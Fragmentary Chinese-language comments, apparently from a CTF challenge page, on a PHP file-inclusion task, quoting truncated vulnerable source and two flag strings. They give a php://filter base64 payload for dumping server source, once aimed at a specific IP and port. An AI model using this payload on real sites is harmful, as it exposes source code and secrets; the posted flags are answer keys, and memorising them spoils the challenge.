跟南邮ctf一摸一样
flag{b8aba5bfc55997b3368ac7b88fe3854f}
http://xxxxxxxxxxxxx/index.php?file=///flag
php伪协议的简单利用
石
过分了,谁都知道是伪协议
?file=php://filter/read=convert.base64-encode/resource=index.php
<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr
<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr
http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg
flag{0e6cd91a87d0df4e99802a322b41c74b}